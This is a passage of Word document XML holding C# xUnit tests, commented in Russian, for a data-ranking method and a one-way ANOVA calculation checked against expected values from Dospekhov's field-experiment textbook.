      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7223F295"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actual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j],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j]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E3770"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sidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A41A085"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p>
    <w:p w14:paraId="72B8108A"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5F7280"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Тестирование метода ранжирования данных. Тест с повторяющимися значениями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB84F6C"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCBC18A"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Pr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>[Fact]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CCCD2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public</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void</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RangeDataWithRepaeat</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E670E4"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
    <w:p w14:paraId="74857EA5"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8, 9, 2, 2, 2 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40586A0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b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3, 1, 4, 8, 1 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE8876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c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6, 5, 3, 1 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659F53B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d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5, 1, 6 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5C1A8E"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 xml:space="preserve">] dat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 a, b, c, d };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64738975"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6D3F7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 xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>analysisController.RangeData</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D28C2F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7FCD99C2"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A</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15.5, 17, 6, 6, 6 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D90A19D"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B</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8.5, 2.5, 10, 15.5, 2.5 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0094BA8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C</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13.5, 11.5, 8.5, 2.5 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C3E916"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D</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11.5, 2.5, 13.5 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD1E55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lastRenderedPageBreak/>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Data</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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>actual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B</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C</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D</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7158BCB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744D489E"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for</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int</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 = 0;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 &lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>rangedData.Length</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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E7CAC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
    <w:p w14:paraId="7E5C5950"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for</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int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> j = 0; j &lt;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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>].Length</w:t>
      </w:r>
      <w:proofErr w:type="gram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j++</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DB4467"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actual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j],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j]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DC0473"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sidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A3923C"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p>
    <w:p w14:paraId="3E2DD559"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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E9118"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Верификация алгоритма однофакторного дисперсионного анализа на основе книги </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Доспехова</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Б.А. "Методика полевого опыта", на странице 223</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F136C9"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Pr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>///</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>&lt;/summary&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CF9A9A"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Fact]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686B0120"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public</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void</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Dospehov223</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>page(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C171A24"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
    <w:p w14:paraId="4D52B809"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454, 470, 430, 500 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796B0CE7"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b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502, 550, 490, 507 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADAFFBE"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c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601, 670, 550, 607 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E91DF62"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d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407, 412, 475, 402 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3397C2"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418, 470, 460, 412 });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F51A931"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 xml:space="preserve">] dat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 a, b, c, d, e };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4B416"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2D0D906D"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ov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ova</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ova</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6A76A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489.35, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.avgX</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B576C7E"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20, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E9E6A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86960.8, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.SSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4370E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17979.75, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.SSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195064D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104940.550, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.SS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C39EBD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4, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.dfA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15197F7C"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15, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.df</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3C6C80"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21740.2, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.MSa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1B23AC"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1198.65, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.MSe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3447A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18.137, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.F</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AE17DA"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3.06, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>anova.Fcrit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>, 1e-3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D5F0E5"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0, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00CC2EBA">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Mono" w:eastAsia="Calibri" w:hAnsi="Cascadia Mono" w:cs="Cascadia Mono"/>
